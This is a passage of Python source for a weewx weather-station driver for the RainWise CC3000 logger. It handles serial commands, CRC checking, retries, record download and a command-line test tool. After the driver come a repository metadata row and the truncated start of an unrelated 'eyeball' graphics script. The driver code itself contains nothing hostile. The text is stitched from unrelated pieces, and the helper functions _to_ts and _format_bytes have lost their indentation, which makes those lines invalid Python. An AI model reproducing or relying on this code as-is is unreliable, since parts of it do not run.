        self.station.set_time()

    @staticmethod
    def _init_station_with_retries(station, max_tries):
        """Initialize the station, retrying up to max_tries on I/O errors."""
        for cnt in range(max_tries):
            try:
                return CC3000Driver._init_station(station)
            except (serial.serialutil.SerialException, weewx.WeeWxIOError) as e:
                log.error("Failed attempt %d of %d to initialize station: %s" %
                          (cnt + 1, max_tries, e))
        else:
            raise weewx.RetriesExceeded("Max retries (%d) exceeded while initializing station" % max_tries)

    @staticmethod
    def _init_station(station):
        """Wake the station and read its configuration into a dict."""
        station.flush()
        station.wakeup()
        station.set_echo()
        settings = dict()
        settings['firmware'] = station.get_version()
        settings['arcint'] = station.get_interval() * 60  # arcint is in seconds
        settings['header'] = CC3000Driver._parse_header(station.get_header())
        settings['units'] = station.get_units()
        settings['channel'] = station.get_channel()
        settings['charger'] = station.get_charger()
        return settings

    @staticmethod
    def _rain_total_to_delta(rain_total, last_rain):
        # calculate the rain delta between the current and previous rain totals.
        return weewx.wxformulas.calculate_rain(rain_total, last_rain)

    @staticmethod
    def _parse_current(values, header, sensor_map):
        """Parse a NOW response into a packet keyed by schema names."""
        return CC3000Driver._parse_values(values, header, sensor_map,
                                          "%Y/%m/%d %H:%M:%S")

    @staticmethod
    def _parse_values(values, header, sensor_map, fmt):
        """parse the values and map them into the schema names.  if there is
        a failure for any one value, then the entire record fails."""
        pkt = dict()
        if len(values) != len(header) + 1:
            log.info("Values/header mismatch: %s %s" % (values, header))
            return pkt
        for i, v in enumerate(values):
            if i >= len(header):
                continue
            label = None
            for m in sensor_map:
                if sensor_map[m] == header[i]:
                    label = m
            if label is None:
                continue
            try:
                if header[i] == 'TIMESTAMP':
                    pkt[label] = _to_ts(v, fmt)
                else:
                    pkt[label] = float(v)
            except ValueError as e:
                log.error("Parse failed for '%s' '%s': %s (idx=%s values=%s)" %
                          (header[i], v, e, i, values))
                return dict()
        return pkt

    @staticmethod
    def _parse_header(header):
        """Strip the HDR token, checksum field, and quotes from a header."""
        h = []
        for v in header:
            if v == 'HDR' or v[0:1] == '!':
                continue
            h.append(v.replace('"', ''))
        return h

    def get_current(self):
        """Return the current readings as a parsed packet."""
        data = self.station.get_current_data()
        return self._parse_current(data, self.header, self.sensor_map)
def _to_ts(tstr, fmt="%Y/%m/%d %H:%M:%S"):
return time.mktime(time.strptime(tstr, fmt))
def _format_bytes(buf):
# byte2int not necessary in PY3 and will raise an exception
# if used ("int object is not subscriptable")
if PY2:
return ' '.join(['%0.2X' % byte2int(c) for c in buf])
return ' '.join(['%0.2X' % c for c in buf])
def _check_crc(buf):
    """Verify the 4-hex-digit CRC16 that follows '!' in a response.

    Responses without a '!' carry no checksum and are accepted as-is.
    Raises ChecksumMismatch when the computed CRC differs from the one
    in the buffer, or BadCRC when the checksum field is not valid hex.
    """
    marker = buf.find(b'!')
    if marker < 0:
        return
    computed = 0
    expected = 0
    field = b''
    try:
        field = buf[marker + 1:marker + 5]
        if DEBUG_CHECKSUM:
            log.debug("Found checksum at %d: %s" % (marker, field))
        computed = crc16(buf[0:marker])  # calculate checksum
        if DEBUG_CHECKSUM:
            log.debug("Calculated checksum %x" % computed)
        expected = int(field, 16)  # checksum provided in data
        if computed != expected:
            raise ChecksumMismatch(computed, expected, buf)
    except ValueError:
        raise BadCRC(computed, field, buf)
class CC3000(object):
    """Low-level serial interface to the RainWise CC3000 data logger.

    Commands are single ASCII lines terminated with CR; the station echoes
    the command and then sends the value.  Some responses end with a
    4-hex-digit CRC16 introduced by '!', which read() verifies.
    """

    DEFAULT_PORT = '/dev/ttyUSB0'

    def __init__(self, port):
        self.port = port
        self.baudrate = 115200
        self.timeout = 1  # seconds for everything except MEM=CLEAR
        # MEM=CLEAR of even two records needs a timeout of 13 or more. 20 is probably safe.
        # flush cmd echo value
        # 0.000022 0.000037 12.819934 0.000084
        # 0.000018 0.000036 12.852024 0.000088
        self.mem_clear_timeout = 20  # reopen w/ bigger timeout for MEM=CLEAR
        self.serial_port = None

    def __enter__(self):
        self.open()
        return self

    def __exit__(self, _, value, traceback):
        self.close()

    def open(self, timeoutOverride=None):
        """Open the serial port, optionally with a non-default timeout."""
        if DEBUG_OPENCLOSE:
            log.debug("Open serial port %s" % self.port)
        to = timeoutOverride if timeoutOverride is not None else self.timeout
        self.serial_port = serial.Serial(self.port, self.baudrate,
                                         timeout=to)

    def close(self):
        """Close the serial port if it is open."""
        if self.serial_port is not None:
            if DEBUG_OPENCLOSE:
                log.debug("Close serial port %s" % self.port)
            self.serial_port.close()
            self.serial_port = None

    def write(self, data):
        """Write a command string; raise WeeWxIOError on a short write."""
        if not PY2:
            # Encode could perhaps fail on bad user input (DST?).
            # If so, this will be handled later when it is observed that the
            # command does not do what is expected.
            data = data.encode('ascii', 'ignore')
        if DEBUG_SERIAL:
            log.debug("Write: '%s'" % data)
        n = self.serial_port.write(data)
        if n is not None and n != len(data):
            raise weewx.WeeWxIOError("Write expected %d chars, sent %d" %
                                     (len(data), n))

    def read(self):
        """The station sends CR NL before and after any response. Some
        responses have a 4-byte CRC checksum at the end, indicated with an
        exclamation. Not every response has a checksum.
        """
        data = self.serial_port.readline()
        if DEBUG_SERIAL:
            log.debug("Read: '%s' (%s)" % (data, _format_bytes(data)))
        data = data.strip()
        _check_crc(data)
        if not PY2:
            # CRC passed, so this is unlikely.
            # Ignore as irregular data will be handled later.
            data = data.decode('ascii', 'ignore')
        return data

    def flush(self):
        """Flush both serial buffers."""
        self.flush_input()
        self.flush_output()

    def flush_input(self):
        log.debug("Flush input buffer")
        self.serial_port.flushInput()

    def flush_output(self):
        log.debug("Flush output buffer")
        self.serial_port.flushOutput()

    def queued_bytes(self):
        """Number of bytes waiting in the input buffer."""
        return self.serial_port.inWaiting()

    def send_cmd(self, cmd):
        """Any command must be terminated with a CR"""
        self.write("%s\r" % cmd)

    def command(self, cmd):
        """Execute cmd, reopening the port with a larger timeout around
        MEM=CLEAR, which takes far longer than any other command."""
        # Sample timings for first fifteen NOW commands after startup.
        # Flush CMD ECHO VALUE
        # -------- -------- -------- --------
        # 0.000021 0.000054 0.041557 0.001364
        # 0.000063 0.000109 0.040432 0.001666
        # 0.000120 0.000123 0.024272 0.016871
        # 0.000120 0.000127 0.025148 0.016657
        # 0.000119 0.000126 0.024966 0.016665
        # 0.000130 0.000142 0.041037 0.001791
        # 0.000120 0.000126 0.023533 0.017023
        # 0.000120 0.000137 0.024336 0.016747
        # 0.000117 0.000133 0.026254 0.016684
        # 0.000120 0.000140 0.025014 0.016739
        # 0.000121 0.000134 0.024801 0.016779
        # 0.000120 0.000141 0.024635 0.016906
        # 0.000118 0.000129 0.024354 0.016894
        # 0.000120 0.000133 0.024214 0.016861
        # 0.000118 0.000122 0.024599 0.016865

        # MEM=CLEAR needs a longer timeout. >12s to clear a small number of records has been observed.
        # It also appears to be highly variable. The two examples below are from two different CC3000s.
        #
        # In this example, clearing at 11,595 records took > 6s.
        # Aug 18 06:46:21 charlemagne weewx[684]: cc3000: logger is at 11595 records, logger clearing threshold is 10000
        # Aug 18 06:46:21 charlemagne weewx[684]: cc3000: clearing all records from logger
        # Aug 18 06:46:21 charlemagne weewx[684]: cc3000: MEM=CLEAR: The resetting of timeout to 20 took 0.000779 seconds.
        # Aug 18 06:46:28 charlemagne weewx[684]: cc3000: MEM=CLEAR: times: 0.000016 0.000118 6.281638 0.000076
        # Aug 18 06:46:28 charlemagne weewx[684]: cc3000: MEM=CLEAR: The resetting of timeout to 1 took 0.001444 seconds.
        #
        # In this example, clearing at 11,475 records took > 12s.
        # Aug 18 07:17:14 ella weewx[615]: cc3000: logger is at 11475 records, logger clearing threshold is 10000
        # Aug 18 07:17:14 ella weewx[615]: cc3000: clearing all records from logger
        # Aug 18 07:17:14 ella weewx[615]: cc3000: MEM=CLEAR: The resetting of timeout to 20 took 0.001586 seconds.
        # Aug 18 07:17:27 ella weewx[615]: cc3000: MEM=CLEAR: times: 0.000020 0.000058 12.459346 0.000092
        # Aug 18 07:17:27 ella weewx[615]: cc3000: MEM=CLEAR: The resetting of timeout to 1 took 0.001755 seconds.
        #
        # Here, clearing 90 records took very close to 13 seconds.
        # Aug 18 14:46:00 ella weewx[24602]: cc3000: logger is at 91 records, logger clearing threshold is 90
        # Aug 18 14:46:00 ella weewx[24602]: cc3000: clearing all records from logger
        # Aug 18 14:46:00 ella weewx[24602]: cc3000: MEM=CLEAR: The resetting of timeout to 20 took 0.000821 seconds.
        # Aug 18 14:46:13 ella weewx[24602]: cc3000: MEM=CLEAR: times: 0.000037 0.000061 12.970494 0.000084
        # Aug 18 14:46:13 ella weewx[24602]: cc3000: MEM=CLEAR: The resetting of timeout to 1 took 0.001416 seconds.
        reset_timeout = False
        # MEM=CLEAR needs a much larger timeout value. Reopen with that larger timeout and reset below.
        #
        # Closing and reopening with a different timeout is quick:
        # Aug 18 07:17:14 ella weewx[615]: cc3000: MEM=CLEAR: The resetting of timeout to 20 took 0.001586 seconds.
        # Aug 18 07:17:27 ella weewx[615]: cc3000: MEM=CLEAR: The resetting of timeout to 1 took 0.001755 seconds.
        if cmd == 'MEM=CLEAR':
            reset_timeout = True  # Reopen with default timeout in finally.
            t1 = time.time()
            self.close()
            self.open(self.mem_clear_timeout)
            t2 = time.time()
            close_open_time = t2 - t1
            log.info("%s: The resetting of timeout to %d took %f seconds." % (cmd, self.mem_clear_timeout, close_open_time))
        try:
            return self.exec_cmd_with_retries(cmd)
        finally:
            if reset_timeout:
                t1 = time.time()
                self.close()
                self.open()
                t2 = time.time()
                close_open_time = t2 - t1
                log.info("%s: The resetting of timeout to %d took %f seconds." % (cmd, self.timeout, close_open_time))

    def exec_cmd_with_retries(self, cmd):
        """Send cmd. Time the reading of the echoed command. If the measured
        time is >= timeout, the cc3000 is borked. The input and output buffers
        will be flushed and the command retried. Try up to 10 times.
        In practice, one retry does the trick.
        """
        attempts = 0
        while attempts < 10:
            attempts += 1
            t1 = time.time()
            self.flush()  # flush
            t2 = time.time()
            flush_time = t2 - t1
            self.send_cmd(cmd)  # send cmd
            t3 = time.time()
            cmd_time = t3 - t2
            data = self.read()  # read the cmd echo
            t4 = time.time()
            echo_time = t4 - t3
            if ((cmd != 'MEM=CLEAR' and echo_time >= self.timeout)
                    or (cmd == 'MEM=CLEAR' and echo_time >= self.mem_clear_timeout)):
                # The command timed out reading back the echo of the command.
                # No need to read the values as it will also time out.
                # Log it and retry. In practice, the retry always works.
                log.info("%s: times: %f %f %f -retrying-" %
                         (cmd, flush_time, cmd_time, echo_time))
                log.info('%s: Reading cmd echo timed out (%f seconds), retrying.' %
                         (cmd, echo_time))
                # Retrying setting the time must be special cased as now a little
                # more than one second has passed. As such, redo the command
                # with the current time.
                if cmd.startswith("TIME=") and cmd != "TIME=?":
                    cmd = self._compose_set_time_command()
                # Retry
            else:
                # Success, the reading of the echoed command did not time out.
                break
        if data != cmd and attempts > 1:
            # After retrying, the cmd always echoes back as an empty string.
            if data == '':
                log.info("%s: Accepting empty string as cmd echo." % cmd)
            else:
                raise weewx.WeeWxIOError(
                    "command: Command failed: cmd='%s' reply='%s'" % (cmd, data))
        t5 = time.time()
        retval = self.read()
        t6 = time.time()
        value_time = t6 - t5
        if cmd == 'MEM=CLEAR':
            log.info("%s: times: %f %f %f %f" %
                     (cmd, flush_time, cmd_time, echo_time, value_time))
        if attempts > 1:
            if retval != '':
                log.info("%s: Retry worked. Total tries: %d" % (cmd, attempts))
            else:
                log.info("%s: Retry failed." % cmd)
            log.info("%s: times: %f %f %f %f" %
                     (cmd, flush_time, cmd_time, echo_time, value_time))
        return retval

    def get_version(self):
        log.debug("Get firmware version")
        return self.command("VERSION")

    def reboot(self):
        """Reboot the station and return the five startup message lines."""
        # Reboot outputs the following (after the reboot):
        # ....................
        # <blank line>
        # Rainwise CC-3000 Version: 1.3 Build 022 Dec 02 2016
        # Flash ID 202015
        # Initializing memory...OK.
        log.debug("Rebooting CC3000.")
        self.send_cmd("REBOOT")
        time.sleep(5)
        dots = self.read()
        blank = self.read()
        ver = self.read()
        flash_id = self.read()
        init_msg = self.read()
        return [dots, blank, ver, flash_id, init_msg]

    # give the station some time to wake up. when we first hit it with a
    # command, it often responds with an empty string. then subsequent
    # commands get the proper response. so for a first command, send something
    # innocuous and wait a bit. hopefully subsequent commands will then work.
    # NOTE: This happens periodically and does not appear to be related to
    # "waking up". Getter commands now retry, so removing the sleep.
    def wakeup(self):
        self.command('ECHO=?')

    def set_echo(self, cmd='ON'):
        log.debug("Set echo to %s" % cmd)
        data = self.command('ECHO=%s' % cmd)
        if data != 'OK':
            raise weewx.WeeWxIOError("Set ECHO failed: %s" % data)

    def get_header(self):
        """Return the raw header row, first element verified to be HDR."""
        log.debug("Get header")
        data = self.command("HEADER")
        cols = data.split(',')
        if cols[0] != 'HDR':
            raise weewx.WeeWxIOError("Expected HDR, got %s" % cols[0])
        return cols

    def set_auto(self):
        # auto does not echo the command
        self.send_cmd("AUTO")

    def get_current_data(self, send_now=True):
        """Fetch current data, either by sending NOW or by reading the next
        line the station pushes (AUTO mode)."""
        data = ''
        if send_now:
            data = self.command("NOW")
        else:
            data = self.read()
        if data == 'NO DATA' or data == 'NO DATA RECEIVED':
            log.debug("No data from sensors")
            return []
        return data.split(',')

    def get_time(self):
        # unlike all of the other accessor methods, the TIME command returns
        # OK after it returns the requested parameter. so we have to pop the
        # OK off the serial so it does not trip up other commands.
        log.debug("Get time")
        tstr = self.command("TIME=?")
        if tstr not in ['ERROR', 'OK']:
            data = self.read()
            if data != 'OK':
                raise weewx.WeeWxIOError("Failed to get time: %s, %s" % (tstr, data))
        return tstr

    @staticmethod
    def _compose_set_time_command():
        """Build a TIME=... command from the current computer time."""
        ts = time.time()
        tstr = time.strftime("%Y/%m/%d %H:%M:%S", time.localtime(ts))
        log.info("Set time to %s (%s)" % (tstr, ts))
        return "TIME=%s" % tstr

    def set_time(self):
        s = self._compose_set_time_command()
        data = self.command(s)
        if data != 'OK':
            raise weewx.WeeWxIOError("Failed to set time to %s: %s" %
                                     (s, data))

    def get_dst(self):
        log.debug("Get daylight saving")
        return self.command("DST=?")

    def set_dst(self, dst):
        log.debug("Set DST to %s" % dst)
        # Firmware 1.3 Build 022 Dec 02 2016 returns 3 lines (<input-dst>,'',OK)
        data = self.command("DST=%s" % dst)  # echoed input dst
        if data != dst:
            raise weewx.WeeWxIOError("Failed to set DST to %s: %s" %
                                     (dst, data))
        data = self.read()  # read ''
        if data not in ['ERROR', 'OK']:
            data = self.read()  # read OK
        if data != 'OK':
            raise weewx.WeeWxIOError("Failed to set DST to %s: %s" %
                                     (dst, data))

    def get_units(self):
        log.debug("Get units")
        return self.command("UNITS=?")

    def set_units(self, units):
        log.debug("Set units to %s" % units)
        data = self.command("UNITS=%s" % units)
        if data != 'OK':
            raise weewx.WeeWxIOError("Failed to set units to %s: %s" %
                                     (units, data))

    def get_interval(self):
        """Return the logging interval in minutes."""
        log.debug("Get logging interval")
        return int(self.command("LOGINT=?"))

    def set_interval(self, interval=5):
        """Set the logging interval, in minutes."""
        log.debug("Set logging interval to %d minutes" % interval)
        data = self.command("LOGINT=%d" % interval)
        if data != 'OK':
            raise weewx.WeeWxIOError("Failed to set logging interval: %s" %
                                     data)

    def get_channel(self):
        log.debug("Get channel")
        return self.command("STATION")

    def set_channel(self, channel):
        log.debug("Set channel to %d" % channel)
        if channel < 0 or 3 < channel:
            raise ValueError("Channel must be 0-3")
        data = self.command("STATION=%d" % channel)
        if data != 'OK':
            raise weewx.WeeWxIOError("Failed to set channel: %s" % data)

    def get_charger(self):
        log.debug("Get charger")
        return self.command("CHARGER")

    def get_baro(self):
        log.debug("Get baro")
        return self.command("BARO")

    def set_baro(self, offset):
        """Set the barometer offset.  offset is a string: '0', XX.XX (inHg)
        or a mbar form (the error text says XXXX.X; the check accepts
        XXX.X -- TODO confirm against firmware docs)."""
        # NOTE: offset is a string (it is compared to '0' and split on '.'),
        # so it must be formatted with %s -- the original %d raised TypeError.
        log.debug("Set barometer offset to %s" % offset)
        if offset != '0':
            parts = offset.split('.')
            if (len(parts) != 2 or
                    (not (len(parts[0]) == 2 and len(parts[1]) == 2) and
                     not (len(parts[0]) == 3 and len(parts[1]) == 1))):
                raise ValueError("Offset must be 0, XX.XX (inHg), or XXXX.X (mbar)")
        data = self.command("BARO=%s" % offset)
        if data != 'OK':
            raise weewx.WeeWxIOError("Failed to set baro: %s" % data)

    def get_memory_status(self):
        # query for logger memory use. output is something like this:
        # 6438 bytes, 111 records, 0%
        log.debug("Get memory status")
        return self.command("MEM=?")

    def get_max(self):
        log.debug("Get max values")
        # Return outside temperature, humidity, pressure, wind direction,
        # wind speed, rainfall (daily total), station voltage, inside
        # temperature.
        return self.command("MAX=?").split(',')

    def reset_max(self):
        log.debug("Reset max values")
        data = self.command("MAX=RESET")
        if data != 'OK':
            raise weewx.WeeWxIOError("Failed to reset max values: %s" % data)

    def get_min(self):
        log.debug("Get min values")
        # Return outside temperature, humidity, pressure, wind direction,
        # wind speed, rainfall (ignore), station voltage, inside temperature.
        return self.command("MIN=?").split(',')

    def reset_min(self):
        log.debug("Reset min values")
        data = self.command("MIN=RESET")
        if data != 'OK':
            raise weewx.WeeWxIOError("Failed to reset min values: %s" % data)

    def get_history_usage(self):
        # return the number of records in the logger
        s = self.get_memory_status()
        if 'records' in s:
            return int(s.split(',')[1].split()[0])
        return None

    def clear_memory(self):
        log.debug("Clear memory")
        data = self.command("MEM=CLEAR")
        # It's a long wait for the OK. With a greatly increased timeout
        # just for MEM=CLEAR, we should be able to read the OK.
        if data == 'OK':
            log.info("MEM=CLEAR succeeded.")
        else:
            raise weewx.WeeWxIOError("Failed to clear memory: %s" % data)

    def get_rain(self):
        log.debug("Get rain total")
        # Firmware 1.3 Build 022 Dec 02 2017 returns OK after the rain count
        # This is like TIME=?
        rstr = self.command("RAIN")
        if rstr not in ['ERROR', 'OK']:
            data = self.read()
            if data != 'OK':
                raise weewx.WeeWxIOError("Failed to get rain: %s" % data)
        return rstr

    def reset_rain(self):
        log.debug("Reset rain counter")
        data = self.command("RAIN=RESET")
        if data != 'OK':
            raise weewx.WeeWxIOError("Failed to reset rain: %s" % data)

    def gen_records_since_ts(self, header, sensor_map, since_ts):
        """Yield parsed archive packets newer than since_ts (epoch secs)."""
        if since_ts is None:
            since_ts = 0.0
            num_records = 0
        else:
            now_ts = time.mktime(datetime.datetime.now().timetuple())
            nseconds = now_ts - since_ts
            nminutes = math.ceil(nseconds / 60.0)
            num_records = math.ceil(nminutes / float(self.get_interval()))
        if num_records == 0:
            log.debug('gen_records_since_ts: Asking for all records.')
        else:
            log.debug('gen_records_since_ts: Asking for %d records.' % num_records)
        for r in self.gen_records(nrec=num_records):
            pkt = CC3000Driver._parse_values(r[1:], header, sensor_map, "%Y/%m/%d %H:%M")
            if 'dateTime' in pkt and pkt['dateTime'] > since_ts:
                yield pkt

    def gen_records(self, nrec=0):
        """
        Generator function for getting nrec records from the device. A value
        of 0 indicates all records.

        The CC3000 returns a header ('HDR,'), the archive records
        we are interested in ('REC,'), daily max and min records
        ('MAX,', 'MIN,') as well as messages for various events such as a
        reboot ('MSG,').

        Things get interesting when nrec is non-zero.

        DOWNLOAD=n returns the latest n records in memory. The CC3000 does
        not distinguish between REC, MAX, MIN and MSG records in memory.
        As such, DOWNLOAD=5 does NOT mean fetch the latest 5 REC records.
        For example, if the latest 5 records include a MIN and a MAX record,
        only 3 REC records will be returned (along with the MIN and MAX
        records).

        Given that one can't precisely ask for a given number of archive
        records, a heuristic is used and errs on the side of asking for
        too many records.

        The heuristic for number of records to ask for is:
        the sum of:
            nrec
            7 * the number of days covered in the request (rounded up)

        Note: One can determine the number of days from the number of
        records requested because the archive interval is known.

        Asking for an extra seven records per day allows for the one MIN and
        one MAX records generated per day, plus a buffer for up to five MSG
        records each day. Unless one is rebooting the CC3000 all day, this
        will be plenty. Typically, there will be zero MSG records. Clearing
        memory and rebooting actions generate MSG records. Both are uncommon.

        As a result, gen_records will overshoot the records asked for, but this
        is not a problem in practice. Also, if a new archive record is written
        while this operation is taking place, it will be returned. As such,
        the number wouldn't be precise anyway. One could work around this by
        accumulating records before returning, and then returning an exact
        amount, but it simply isn't worth it.

        Examining the records in the CC3000 (808 records at the time of the
        examination) shows the following records found:
        HDR: 1 (the header record, per the spec)
        REC: 800 (the archive records -- ~2.8 days worth)
        MSG: 1 (A clear command that executed ~2.8 days ago:
                MSG 2019/12/20 15:48 CLEAR ON COMMAND!749D)
        MIN: 3 (As expected for 3 days.)
        MAX: 3 (As expected for 3 days.)

        Interrogating the CC3000 for a large number of records fails miserably
        if, while reading the responses, the responses are parsed and added
        to the database. (Check sum mismatches, partial records, etc.). If
        these last two steps are skipped, reading from the CC3000 is very
        reliable. This can be observed by asking for history with wee_config.
        Observed with > 11K of records.

        To address the above problem, all records are read into memory. Reading
        all records into memory before parsing and inserting into the database
        is very reliable. For smaller amounts of records, the reading into
        memory could be skipped, but what would be the point?
        """
        log.debug('gen_records(%d)' % nrec)
        totrec = self.get_history_usage()
        log.debug('gen_records: Requested %d latest of %d records.' % (nrec, totrec))
        if nrec == 0:
            num_to_ask = 0
        else:
            # Determine the number of records to ask for.
            # See heuristic above.
            num_mins_asked = nrec * self.get_interval()
            num_days_asked = math.ceil(num_mins_asked / (24.0*60))
            num_to_ask = nrec + 7 * num_days_asked
        if num_to_ask == 0:
            cmd = 'DOWNLOAD'
        else:
            cmd = 'DOWNLOAD=%d' % num_to_ask
        log.debug('%s' % cmd)
        # Note: It takes about 14s to read 1000 records into memory.
        if num_to_ask == 0:
            log.info('Reading all records into memory. This could take some time.')
        elif num_to_ask < 1000:
            log.info('Reading %d records into memory.' % num_to_ask)
        else:
            log.info('Reading %d records into memory. This could take some time.' % num_to_ask)
        recs = []
        data = self.command(cmd)
        while data != 'OK':
            recs.append(data)
            data = self.read()
        log.info('Finished reading %d records.' % len(recs))
        yielded = 0
        for data in recs:
            values = data.split(',')
            if values[0] == 'REC':
                yielded += 1
                yield values
            elif (values[0] == 'HDR' or values[0] == 'MSG' or
                  values[0] == 'MIN' or values[0] == 'MAX' or
                  values[0].startswith('DOWNLOAD')):
                pass
            else:
                log.error("Unexpected record '%s' (%s)" % (values[0], data))
        log.debug('Downloaded %d records' % yielded)
class CC3000ConfEditor(weewx.drivers.AbstractConfEditor):
    # Supplies the sample [CC3000] stanza and the interactive prompts used
    # by the weewx configuration utilities.
    @property
    def default_stanza(self):
        # The returned text is written verbatim into weewx.conf, with the
        # default serial port substituted in.
        return """
[CC3000]
    # This section is for RainWise MarkIII weather stations and CC3000 logger.
    # Serial port such as /dev/ttyS0, /dev/ttyUSB0, or /dev/cuaU0
    port = %s
    # The station model, e.g., CC3000 or CC3000R
    model = CC3000
    # The driver to use:
    driver = weewx.drivers.cc3000
""" % (CC3000.DEFAULT_PORT,)
    def prompt_for_settings(self):
        # Ask the user which serial device the station is attached to;
        # _prompt comes from AbstractConfEditor.
        print("Specify the serial port on which the station is connected, for")
        print("example /dev/ttyUSB0 or /dev/ttyS0.")
        port = self._prompt('port', CC3000.DEFAULT_PORT)
        return {'port': port}
# define a main entry point for basic testing. invoke from the weewx root dir:
#
# PYTHONPATH=bin python -m weewx.drivers.cc3000 --help
#
# FIXME: This duplicates all of the functionality in CC3000Conigurator.
# Perhaps pare this down to a version option and, by default,
# polling and printing records (a la, the vantage driver)..
if __name__ == '__main__':
    import optparse
    import weewx
    import weeutil.logger
    usage = """%prog [options] [--help]"""
    parser = optparse.OptionParser(usage=usage)
    # Each option below corresponds to one CC3000 serial command; see the
    # CC3000 class for the underlying protocol.
    parser.add_option('--version', action='store_true',
                      help='display driver version')
    parser.add_option('--test-crc', dest='testcrc', action='store_true',
                      help='test crc')
    parser.add_option('--port', metavar='PORT',
                      help='port to which the station is connected',
                      default=CC3000.DEFAULT_PORT)
    parser.add_option('--get-version', dest='getver', action='store_true',
                      help='display firmware version')
    parser.add_option('--debug', action='store_true', default=False,
                      help='emit additional diagnostic information')
    parser.add_option('--get-status', dest='status', action='store_true',
                      help='display memory status')
    parser.add_option('--get-channel', dest='getch', action='store_true',
                      help='display station channel')
    parser.add_option('--set-channel', dest='setch', metavar='CHANNEL',
                      help='set station channel')
    parser.add_option('--get-battery', dest='getbat', action='store_true',
                      help='display battery status')
    parser.add_option('--get-current', dest='getcur', action='store_true',
                      help='display current data')
    parser.add_option('--get-memory', dest='getmem', action='store_true',
                      help='display memory status')
    parser.add_option('--get-records', dest='getrec', metavar='NUM_RECORDS',
                      help='display records from station memory')
    parser.add_option('--get-header', dest='gethead', action='store_true',
                      help='display data header')
    parser.add_option('--get-units', dest='getunits', action='store_true',
                      help='display units')
    parser.add_option('--set-units', dest='setunits', metavar='UNITS',
                      help='set units to ENGLISH or METRIC')
    parser.add_option('--get-time', dest='gettime', action='store_true',
                      help='display station time')
    parser.add_option('--set-time', dest='settime', action='store_true',
                      help='set station time to computer time')
    parser.add_option('--get-dst', dest='getdst', action='store_true',
                      help='display daylight savings settings')
    parser.add_option('--set-dst', dest='setdst',
                      metavar='mm/dd HH:MM,mm/dd HH:MM,[MM]M',
                      help='set daylight savings start, end, and amount')
    parser.add_option('--get-interval', dest='getint', action='store_true',
                      help='display logging interval, in seconds')
    parser.add_option('--set-interval', dest='setint', metavar='INTERVAL',
                      type=int, help='set logging interval, in seconds')
    parser.add_option('--clear-memory', dest='clear', action='store_true',
                      help='clear logger memory')
    parser.add_option('--get-rain', dest='getrain', action='store_true',
                      help='get rain counter')
    parser.add_option('--reset-rain', dest='resetrain', action='store_true',
                      help='reset rain counter')
    parser.add_option('--get-max', dest='getmax', action='store_true',
                      help='get max counter')
    parser.add_option('--reset-max', dest='resetmax', action='store_true',
                      help='reset max counters')
    parser.add_option('--get-min', dest='getmin', action='store_true',
                      help='get min counter')
    parser.add_option('--reset-min', dest='resetmin', action='store_true',
                      help='reset min counters')
    parser.add_option('--poll', metavar='POLL_INTERVAL', type=int,
                      help='poll interval in seconds')
    parser.add_option('--reboot', dest='reboot', action='store_true',
                      help='reboot the station')
    (options, args) = parser.parse_args()
    # Options that do not need the serial port are handled first.
    if options.version:
        print("%s driver version %s" % (DRIVER_NAME, DRIVER_VERSION))
        exit(0)
    if options.debug:
        DEBUG_SERIAL = 1
        DEBUG_CHECKSUM = 1
        DEBUG_OPENCLOSE = 1
        weewx.debug = 1
    weeutil.logger.setup('cc3000', {})
    if options.testcrc:
        # Exercise _check_crc with known-good sample responses.
        _check_crc(b'OK')
        _check_crc(b'REC,2010/01/01 14:12, 64.5, 85,29.04,349, 2.4, 4.2, 0.00, 6.21, 0.25, 73.2,!B82C')
        _check_crc(b'MSG,2010/01/01 20:22,CHARGER ON,!4CED')
        exit(0)
    # Everything below talks to the station over the serial port.
    with CC3000(options.port) as s:
        s.flush()
        s.wakeup()
        s.set_echo()
        if options.getver:
            print(s.get_version())
        if options.reboot:
            print('rebooting...')
            startup_msgs = s.reboot()
            for line in startup_msgs:
                print(line)
        if options.status:
            print("Firmware:", s.get_version())
            print("Time:", s.get_time())
            print("DST:", s.get_dst())
            print("Units:", s.get_units())
            print("Memory:", s.get_memory_status())
            print("Interval:", s.get_interval() * 60)
            print("Channel:", s.get_channel())
            print("Charger:", s.get_charger())
            print("Baro:", s.get_baro())
            print("Rain:", s.get_rain())
            print("Max values:", s.get_max())
            print("Min values:", s.get_min())
        if options.getch:
            print(s.get_channel())
        if options.setch is not None:
            s.set_channel(int(options.setch))
        if options.getbat:
            print(s.get_charger())
        if options.getcur:
            print(s.get_current_data())
        if options.getmem:
            print(s.get_memory_status())
        if options.getrec is not None:
            i = 0
            for r in s.gen_records(int(options.getrec)):
                print(i, r)
                i += 1
        if options.gethead:
            print(s.get_header())
        if options.getunits:
            print(s.get_units())
        if options.setunits:
            s.set_units(options.setunits)
        if options.gettime:
            print(s.get_time())
        if options.settime:
            s.set_time()
        if options.getdst:
            print(s.get_dst())
        if options.setdst:
            s.set_dst(options.setdst)
        if options.getint:
            # LOGINT is stored in minutes; display in seconds.
            print(s.get_interval() * 60)
        if options.setint:
            s.set_interval(int(options.setint) / 60)
        if options.clear:
            s.clear_memory()
        if options.getrain:
            print(s.get_rain())
        if options.resetrain:
            print(s.reset_rain())
        if options.getmax:
            print(s.get_max())
        if options.resetmax:
            print(s.reset_max())
        if options.getmin:
            print(s.get_min())
        if options.resetmin:
            print(s.reset_min())
        if options.poll is not None:
            # poll=0 switches the station to AUTO (push) mode; otherwise
            # issue NOW every poll seconds.
            cmd_mode = True
            if options.poll == 0:
                cmd_mode = False
                s.set_auto()
            while True:
                print(s.get_current_data(cmd_mode))
                time.sleep(options.poll)
| [
"tom@tom.org"
] | tom@tom.org |
68d1843dab90410740fd85f5d830ddfa869461ce | 5a9ec9ed961f2eb050704f6e9e54dcecddeb6f1b | /all_eyes_on_you.py | 8baf8f12e628038627489b918e7a1d8430e36b29 | [] | no_license | jristow/startingPythonWork | 51a1553a18e75b5df827c0ca21208c2e66e9a4fb | dfe5ccca0dd493c1758f047cd1b9f853e46aaecc | refs/heads/master | 2021-01-24T03:29:56.573757 | 2018-05-12T03:05:57 | 2018-05-12T03:05:57 | 122,891,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,275 | py | ''' Step 1: Create a graphwin object, draw 5 eyes into it
-Create an eye class that will easily enable drawing an 'eye' into a window
Step 2: Get a mouseclick from the user
Step 3: Move the pupils to 'look' at where the mouse clicked
'''
from graphics import *
class Eyeball:
    """A square 'eye' drawn with the graphics.py toolkit: a 20x20 white
    outline containing a 10x10 black pupil, both centered on centerPoint.

    updatePupil shifts the pupil horizontally toward a clicked point,
    clamped so it stays inside the outline.  NOTE(review): the stored pupil
